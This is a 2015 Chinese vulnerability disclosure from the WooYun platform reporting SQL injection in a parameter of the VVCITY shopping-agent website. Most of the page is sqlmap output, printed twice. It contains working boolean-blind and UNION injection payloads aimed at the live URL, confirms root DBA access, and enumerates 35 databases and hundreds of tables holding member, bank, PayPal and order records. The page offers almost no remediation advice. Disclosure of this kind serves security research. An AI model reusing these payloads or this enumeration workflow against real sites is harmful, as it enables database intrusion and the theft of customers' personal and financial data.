当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125669

漏洞标题:香港VVCITY代购网主站SQL注入(大量用户和订单信息泄露,包括:姓名,地址,手机号,银行卡号等等)

相关厂商:香港VVCITY代购网

漏洞作者: 安全小飞侠

提交时间:2015-07-09 16:03

修复时间:2015-08-23 16:04

公开时间:2015-08-23 16:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请叫我安全小飞侠,谢谢!

详细说明:

香港VVCITY代购网主站SQL注入,涉及35个数据库,包括大量订单和用户信息(用户名,密码,手机,地址,银行卡号等等)。

http://www.vvcity.com/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=13538
注入参数: categoryid
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=l
ifeessence_bathsalts-sample-1&categoryid=(SELECT (CASE WHEN (4464=4464) THEN 446
4 ELSE 4464*(SELECT 4464 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=l
ifeessence_bathsalts-sample-1&categoryid=-4017 UNION ALL SELECT NULL,NULL,NULL,N
ULL,CONCAT(0x71786b7171,0x79676d576e7354506878,0x7171787171),NULL,NULL,NULL,NULL
--
---
[14:26:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[14:26:53] [INFO] fetching current user
[14:26:55] [WARNING] reflective value(s) found and filtering out
current user:    'root@localhost'
current database:    'probid'
current user is DBA:    True


available databases [35]:
[*] balance
[*] bitweaver
[*] customer_service
[*] datacenter
[*] diamond
[*] fresh
[*] fresh2
[*] girsty
[*] glory
[*] hoorayos
[*] information_schema
[*] insect
[*] korea_shopping
[*] mysql
[*] mytest
[*] ohmycome
[*] paypal
[*] phpmyadmin
[*] probid
[*] probid333
[*] seo
[*] shop
[*] shop68
[*] siu
[*] sjc
[*] sms
[*] staff_time_slot
[*] taobaoke
[*] test
[*] united
[*] vv_api
[*] welldone
[*] winsix
[*] winsix_site2
[*] zozojp
Database: probid
[274 tables]
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| log                                  | 4794997 |
| hk_whatsapp_phone                    | 4192002 |
| auction_log                          | 2887586 |
| search_keyword                       | 867548  |
| code_running_time                    | 703338  |
| `usage`                              | 613965  |
| auction_log_backup                   | 399434  |
| portage_log                          | 238293  |
| auction                              | 171733  |
| auction_conversation                 | 143934  |
| email_list                           | 124197  |
| deposit                              | 119608  |
| alipay_audit                         | 113914  |
| ipcountry                            | 111799  |
| service_charge_log                   | 108842  |
| yahoo_autopay                        | 100927  |
| deposit_automation                   | 91607   |
| taobao_deposit                       | 79807   |
| order_shopping                       | 75761   |
| deposit_log                          | 72374   |
| auction_option                       | 71418   |
| item_category_japan_jyahoobid        | 69549   |
| portage_order                        | 63964   |
| deposit_automation_old               | 56812   |
| auction_conversation_backup          | 48660   |
| item_category_japan_jrakutenshopping | 47893   |
| watchlist                            | 44376   |
| email_log                            | 40844   |
| yahoo_auction_category               | 38919   |
| auction_service                      | 31579   |
| rakuten_category                     | 29466   |
| member                               | 25662   |
| rakuten_bank                         | 24879   |
| bank_pretend                         | 22685   |
| auction_tax_cert                     | 21709   |
| timeattendence                       | 21579   |
| banip                                | 20942   |
| portage                              | 20458   |
| tbk_receipt2                         | 20125   |
| auction_won_items                    | 19981   |
| hk_whatsapp_collect_range            | 19966   |
| sms_record                           | 19242   |
| tbk_report3                          | 16962   |
| lang                                 | 14432   |
| auction_fail                         | 14295   |
| deposit_audit                        | 13672   |
| visit                                | 13551   |
| auction_drawback_item_new            | 13377   |
| auction_sub                          | 13338   |
| japan_pickup                         | 13325   |
| taobao_deposit_history               | 12220   |
| item_hot_japan                       | 11847   |
| bidders_category                     | 10464   |
| business_promotion                   | 10325   |
| item_category_japan_jyahooshopping   | 9979    |
| coupon                               | 9719    |
| yahoo_shopping_category              | 9472    |
| member_enquire                       | 9155    |
| rakuten_bank_bf                      | 8377    |
| bio_taobaocategory                   | 8362    |
| twyahoo_category                     | 7127    |
| item_declare                         | 6873    |
| promotion_sms                        | 6101    |
| hk_whatsapp_group_phone              | 4609    |
| ipcountry_new                        | 4333    |
| jp_url                               | 4297    |
| taobao_cat                           | 4099    |
| auction_drawback_item_new_bf         | 3852    |
| paypal                               | 3785    |
| balance                              | 3699    |
| deposit_auto_order                   | 3675    |
| deposit_auto_user                    | 3636    |
| entrylog                             | 3462    |
| taobao_alipay_acc                    | 3086    |
| user_auction                         | 2579    |
| member_crm                           | 2244    |
| hk_whatsapp_sender                   | 2152    |
| tbk_user2                            | 2060    |
| mkcash                               | 1993    |
| gmail                                | 1761    |
| auction_cash_delivery                | 1722    |
| taobao_tmall_cat                     | 1712    |
| rakuten_bank_backup                  | 1658    |
| cart                                 | 1657    |
| entry_log                            | 1642    |
| forum_post                           | 1258    |
| taobao_cat_new                       | 1163    |
| auction_question                     | 1089    |
| auction_drawback_item_new_backup     | 1025    |
| auction_reseller_charge              | 996     |
| auction_drawback_item                | 994     |
| drawback_item                        | 900     |
| question                             | 833     |
| withdraw_feedback                    | 830     |
| bank_record                          | 752     |
| rate_auto                            | 748     |
| auction_sellermsg_sentfail           | 657     |
| auction_tb                           | 654     |
| quotation                            | 607     |
| promo_sms                            | 506     |
| tbk_cash2                            | 480     |
| notice                               | 424     |
| member_identify                      | 403     |
| taobao_withdraw                      | 398     |
| fee                                  | 385     |
| bank_import                          | 378     |
| tbk_receipt                          | 364     |
| procat_item                          | 330     |
| api_access_log                       | 320     |
| auction_paid_items                   | 311     |
| location_stock_time                  | 290     |
| taobao_deposit_duplicate             | 271     |
| japan_accountant                     | 266     |
| `order`                              | 253     |
| country                              | 239     |
| `exception`                          | 226     |
| `api_mogujie_category_just-test`     | 222     |
| jp_cat                               | 216     |
| auction_contact                      | 207     |
| hk_whatsapp_group                    | 191     |
| stock                                | 190     |
| banking_accountant                   | 174     |
| portage_category                     | 168     |
| auction_sell                         | 161     |
| customer_pending_event               | 160     |
| location_cash                        | 159     |
| hk_whatsapp_group_send_log           | 154     |
| api_mogujie_category                 | 152     |
| banktransfer                         | 148     |
| sp_attribute                         | 146     |
| like_record_detail                   | 122     |
| hk_stock                             | 121     |
| like_record                          | 117     |
| rate_log                             | 112     |
| expense                              | 104     |
| deposit_sub_user                     | 94      |
| customer_pending_log                 | 86      |
| member_forum                         | 86      |
| rate_intl                            | 84      |
| taobao_defined_cat                   | 81      |
| rate_cost                            | 74      |
| web_announcement                     | 67      |
| portage_courier                      | 64      |
| remittance_agent                     | 61      |
| japan_declare_enname                 | 58      |
| fanclub_order                        | 53      |
| fedex_waybill                        | 53      |
| holiday_item                         | 53      |
| item_find_log                        | 47      |
| tags                                 | 47      |
| products                             | 46      |
| customer_feedback                    | 44      |
| yauction_subcategory                 | 37      |
| staff                                | 33      |
| staff_time_slot                      | 33      |
| deposit_temp                         | 32      |
| procat_category                      | 31      |
| item_category_japan_jyahoobid_test   | 30      |
| item_find                            | 30      |
| event_cron                           | 29      |
| alipay_calc                          | 26      |
| hk_category                          | 25      |
| sp_detail                            | 25      |
| yauction_category                    | 25      |
| deposit_type                         | 24      |
| yahoo_account                        | 24      |
| sp_catsub                            | 23      |
| find_itemcat                         | 22      |
| tbk_user                             | 22      |
| api_usage                            | 21      |
| hotlist                              | 20      |
| stock_category                       | 20      |
| discount_list                        | 19      |
| discuz_mem                           | 19      |
| autosearch                           | 18      |
| tbk_cash                             | 18      |
| deposit_amendment                    | 17      |
| product_category                     | 17      |
| discuz_list                          | 16      |
| discuz                               | 15      |
| hk_whatsapp_reply                    | 15      |
| seo_proxy                            | 15      |
| find_product                         | 14      |
| hk_whatsapp_operator                 | 12      |
| item_status                          | 12      |
| mkcash_cat                           | 11      |
| auction_gmail_ext                    | 10      |
| email_content                        | 10      |
| japan_accountant_type                | 10      |
| member_points                        | 10      |
| portage_charge                       | 10      |
| share_item_comment                   | 10      |
| stock_location                       | 10      |
| tbk_report2                          | 10      |
| colleague                            | 9       |
| product_item                         | 9       |
| share_items                          | 9       |
| sp_category                          | 9       |
| barcode_label                        | 8       |
| deposit_status                       | 8       |
| fee_type                             | 8       |
| paypal_account                       | 8       |
| post_type                            | 8       |
| sp_product                           | 8       |
| keywords                             | 7       |
| member_type                          | 7       |
| portage_location                     | 7       |
| stock_keyword                        | 7       |
| alipay_type                          | 6       |
| app                                  | 6       |
| ass_pattern                          | 6       |
| m_points                             | 6       |
| share_link                           | 6       |
| alimama_report                       | 5       |
| auction_schedule_items               | 5       |
| deposit_method                       | 5       |
| fanclub_status                       | 5       |
| find_web_name                        | 5       |
| tsearch                              | 5       |
| agent_account                        | 4       |
| item_cat                             | 4       |
| item_type                            | 4       |
| log_type                             | 4       |
| sms_bid                              | 4       |
| account_balance                      | 3       |
| auction_received_jp                  | 3       |
| bank_account                         | 3       |
| crm_ratio                            | 3       |
| customer_contact_inquire             | 3       |
| deposit_desc                         | 3       |
| portage_address                      | 3       |
| remittance_bank_fee                  | 3       |
| reseller_config                      | 3       |
| service_charge_type                  | 3       |
| share_item_like                      | 3       |
| tsearch_type                         | 3       |
| website_spread                       | 3       |
| website_spread_log                   | 3       |
| delivery                             | 2       |
| deposit_account                      | 2       |
| fb_company                           | 2       |
| fee_region                           | 2       |
| find_status                          | 2       |
| fram_site                            | 2       |
| promotion_website_member             | 2       |
| question_type                        | 2       |
| rank_jp                              | 2       |
| share_album                          | 2       |
| user_session                         | 2       |
| commission                           | 1       |
| crm_config                           | 1       |
| lkr                                  | 1       |
| m_coupon                             | 1       |
| oauth                                | 1       |
| promotion_website                    | 1       |
| rate                                 | 1       |
| shopping_discount                    | 1       |
| taobao_rate                          | 1       |
| tbk_order                            | 1       |
| tbk_setting                          | 1       |
| website_spread_cash                  | 1       |
+--------------------------------------+---------+
Database: probid
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 25662   |
+--------+---------+


member.jpg

漏洞证明:

http://www.vvcity.com/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=13538
注入参数: categoryid
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=l
ifeessence_bathsalts-sample-1&categoryid=(SELECT (CASE WHEN (4464=4464) THEN 446
4 ELSE 4464*(SELECT 4464 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=l
ifeessence_bathsalts-sample-1&categoryid=-4017 UNION ALL SELECT NULL,NULL,NULL,N
ULL,CONCAT(0x71786b7171,0x79676d576e7354506878,0x7171787171),NULL,NULL,NULL,NULL
--
---
[14:26:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[14:26:53] [INFO] fetching current user
[14:26:55] [WARNING] reflective value(s) found and filtering out
current user:    'root@localhost'
current database:    'probid'
current user is DBA:    True


available databases [35]:
[*] balance
[*] bitweaver
[*] customer_service
[*] datacenter
[*] diamond
[*] fresh
[*] fresh2
[*] girsty
[*] glory
[*] hoorayos
[*] information_schema
[*] insect
[*] korea_shopping
[*] mysql
[*] mytest
[*] ohmycome
[*] paypal
[*] phpmyadmin
[*] probid
[*] probid333
[*] seo
[*] shop
[*] shop68
[*] siu
[*] sjc
[*] sms
[*] staff_time_slot
[*] taobaoke
[*] test
[*] united
[*] vv_api
[*] welldone
[*] winsix
[*] winsix_site2
[*] zozojp
Database: probid
[274 tables]
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| log                                  | 4794997 |
| hk_whatsapp_phone                    | 4192002 |
| auction_log                          | 2887586 |
| search_keyword                       | 867548  |
| code_running_time                    | 703338  |
| `usage`                              | 613965  |
| auction_log_backup                   | 399434  |
| portage_log                          | 238293  |
| auction                              | 171733  |
| auction_conversation                 | 143934  |
| email_list                           | 124197  |
| deposit                              | 119608  |
| alipay_audit                         | 113914  |
| ipcountry                            | 111799  |
| service_charge_log                   | 108842  |
| yahoo_autopay                        | 100927  |
| deposit_automation                   | 91607   |
| taobao_deposit                       | 79807   |
| order_shopping                       | 75761   |
| deposit_log                          | 72374   |
| auction_option                       | 71418   |
| item_category_japan_jyahoobid        | 69549   |
| portage_order                        | 63964   |
| deposit_automation_old               | 56812   |
| auction_conversation_backup          | 48660   |
| item_category_japan_jrakutenshopping | 47893   |
| watchlist                            | 44376   |
| email_log                            | 40844   |
| yahoo_auction_category               | 38919   |
| auction_service                      | 31579   |
| rakuten_category                     | 29466   |
| member                               | 25662   |
| rakuten_bank                         | 24879   |
| bank_pretend                         | 22685   |
| auction_tax_cert                     | 21709   |
| timeattendence                       | 21579   |
| banip                                | 20942   |
| portage                              | 20458   |
| tbk_receipt2                         | 20125   |
| auction_won_items                    | 19981   |
| hk_whatsapp_collect_range            | 19966   |
| sms_record                           | 19242   |
| tbk_report3                          | 16962   |
| lang                                 | 14432   |
| auction_fail                         | 14295   |
| deposit_audit                        | 13672   |
| visit                                | 13551   |
| auction_drawback_item_new            | 13377   |
| auction_sub                          | 13338   |
| japan_pickup                         | 13325   |
| taobao_deposit_history               | 12220   |
| item_hot_japan                       | 11847   |
| bidders_category                     | 10464   |
| business_promotion                   | 10325   |
| item_category_japan_jyahooshopping   | 9979    |
| coupon                               | 9719    |
| yahoo_shopping_category              | 9472    |
| member_enquire                       | 9155    |
| rakuten_bank_bf                      | 8377    |
| bio_taobaocategory                   | 8362    |
| twyahoo_category                     | 7127    |
| item_declare                         | 6873    |
| promotion_sms                        | 6101    |
| hk_whatsapp_group_phone              | 4609    |
| ipcountry_new                        | 4333    |
| jp_url                               | 4297    |
| taobao_cat                           | 4099    |
| auction_drawback_item_new_bf         | 3852    |
| paypal                               | 3785    |
| balance                              | 3699    |
| deposit_auto_order                   | 3675    |
| deposit_auto_user                    | 3636    |
| entrylog                             | 3462    |
| taobao_alipay_acc                    | 3086    |
| user_auction                         | 2579    |
| member_crm                           | 2244    |
| hk_whatsapp_sender                   | 2152    |
| tbk_user2                            | 2060    |
| mkcash                               | 1993    |
| gmail                                | 1761    |
| auction_cash_delivery                | 1722    |
| taobao_tmall_cat                     | 1712    |
| rakuten_bank_backup                  | 1658    |
| cart                                 | 1657    |
| entry_log                            | 1642    |
| forum_post                           | 1258    |
| taobao_cat_new                       | 1163    |
| auction_question                     | 1089    |
| auction_drawback_item_new_backup     | 1025    |
| auction_reseller_charge              | 996     |
| auction_drawback_item                | 994     |
| drawback_item                        | 900     |
| question                             | 833     |
| withdraw_feedback                    | 830     |
| bank_record                          | 752     |
| rate_auto                            | 748     |
| auction_sellermsg_sentfail           | 657     |
| auction_tb                           | 654     |
| quotation                            | 607     |
| promo_sms                            | 506     |
| tbk_cash2                            | 480     |
| notice                               | 424     |
| member_identify                      | 403     |
| taobao_withdraw                      | 398     |
| fee                                  | 385     |
| bank_import                          | 378     |
| tbk_receipt                          | 364     |
| procat_item                          | 330     |
| api_access_log                       | 320     |
| auction_paid_items                   | 311     |
| location_stock_time                  | 290     |
| taobao_deposit_duplicate             | 271     |
| japan_accountant                     | 266     |
| `order`                              | 253     |
| country                              | 239     |
| `exception`                          | 226     |
| `api_mogujie_category_just-test`     | 222     |
| jp_cat                               | 216     |
| auction_contact                      | 207     |
| hk_whatsapp_group                    | 191     |
| stock                                | 190     |
| banking_accountant                   | 174     |
| portage_category                     | 168     |
| auction_sell                         | 161     |
| customer_pending_event               | 160     |
| location_cash                        | 159     |
| hk_whatsapp_group_send_log           | 154     |
| api_mogujie_category                 | 152     |
| banktransfer                         | 148     |
| sp_attribute                         | 146     |
| like_record_detail                   | 122     |
| hk_stock                             | 121     |
| like_record                          | 117     |
| rate_log                             | 112     |
| expense                              | 104     |
| deposit_sub_user                     | 94      |
| customer_pending_log                 | 86      |
| member_forum                         | 86      |
| rate_intl                            | 84      |
| taobao_defined_cat                   | 81      |
| rate_cost                            | 74      |
| web_announcement                     | 67      |
| portage_courier                      | 64      |
| remittance_agent                     | 61      |
| japan_declare_enname                 | 58      |
| fanclub_order                        | 53      |
| fedex_waybill                        | 53      |
| holiday_item                         | 53      |
| item_find_log                        | 47      |
| tags                                 | 47      |
| products                             | 46      |
| customer_feedback                    | 44      |
| yauction_subcategory                 | 37      |
| staff                                | 33      |
| staff_time_slot                      | 33      |
| deposit_temp                         | 32      |
| procat_category                      | 31      |
| item_category_japan_jyahoobid_test   | 30      |
| item_find                            | 30      |
| event_cron                           | 29      |
| alipay_calc                          | 26      |
| hk_category                          | 25      |
| sp_detail                            | 25      |
| yauction_category                    | 25      |
| deposit_type                         | 24      |
| yahoo_account                        | 24      |
| sp_catsub                            | 23      |
| find_itemcat                         | 22      |
| tbk_user                             | 22      |
| api_usage                            | 21      |
| hotlist                              | 20      |
| stock_category                       | 20      |
| discount_list                        | 19      |
| discuz_mem                           | 19      |
| autosearch                           | 18      |
| tbk_cash                             | 18      |
| deposit_amendment                    | 17      |
| product_category                     | 17      |
| discuz_list                          | 16      |
| discuz                               | 15      |
| hk_whatsapp_reply                    | 15      |
| seo_proxy                            | 15      |
| find_product                         | 14      |
| hk_whatsapp_operator                 | 12      |
| item_status                          | 12      |
| mkcash_cat                           | 11      |
| auction_gmail_ext                    | 10      |
| email_content                        | 10      |
| japan_accountant_type                | 10      |
| member_points                        | 10      |
| portage_charge                       | 10      |
| share_item_comment                   | 10      |
| stock_location                       | 10      |
| tbk_report2                          | 10      |
| colleague                            | 9       |
| product_item                         | 9       |
| share_items                          | 9       |
| sp_category                          | 9       |
| barcode_label                        | 8       |
| deposit_status                       | 8       |
| fee_type                             | 8       |
| paypal_account                       | 8       |
| post_type                            | 8       |
| sp_product                           | 8       |
| keywords                             | 7       |
| member_type                          | 7       |
| portage_location                     | 7       |
| stock_keyword                        | 7       |
| alipay_type                          | 6       |
| app                                  | 6       |
| ass_pattern                          | 6       |
| m_points                             | 6       |
| share_link                           | 6       |
| alimama_report                       | 5       |
| auction_schedule_items               | 5       |
| deposit_method                       | 5       |
| fanclub_status                       | 5       |
| find_web_name                        | 5       |
| tsearch                              | 5       |
| agent_account                        | 4       |
| item_cat                             | 4       |
| item_type                            | 4       |
| log_type                             | 4       |
| sms_bid                              | 4       |
| account_balance                      | 3       |
| auction_received_jp                  | 3       |
| bank_account                         | 3       |
| crm_ratio                            | 3       |
| customer_contact_inquire             | 3       |
| deposit_desc                         | 3       |
| portage_address                      | 3       |
| remittance_bank_fee                  | 3       |
| reseller_config                      | 3       |
| service_charge_type                  | 3       |
| share_item_like                      | 3       |
| tsearch_type                         | 3       |
| website_spread                       | 3       |
| website_spread_log                   | 3       |
| delivery                             | 2       |
| deposit_account                      | 2       |
| fb_company                           | 2       |
| fee_region                           | 2       |
| find_status                          | 2       |
| fram_site                            | 2       |
| promotion_website_member             | 2       |
| question_type                        | 2       |
| rank_jp                              | 2       |
| share_album                          | 2       |
| user_session                         | 2       |
| commission                           | 1       |
| crm_config                           | 1       |
| lkr                                  | 1       |
| m_coupon                             | 1       |
| oauth                                | 1       |
| promotion_website                    | 1       |
| rate                                 | 1       |
| shopping_discount                    | 1       |
| taobao_rate                          | 1       |
| tbk_order                            | 1       |
| tbk_setting                          | 1       |
| website_spread_cash                  | 1       |
+--------------------------------------+---------+
Database: probid
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 25662   |
+--------+---------+


修复方案:

你懂的,好好修复!

版权声明:转载请注明来源 安全小飞侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)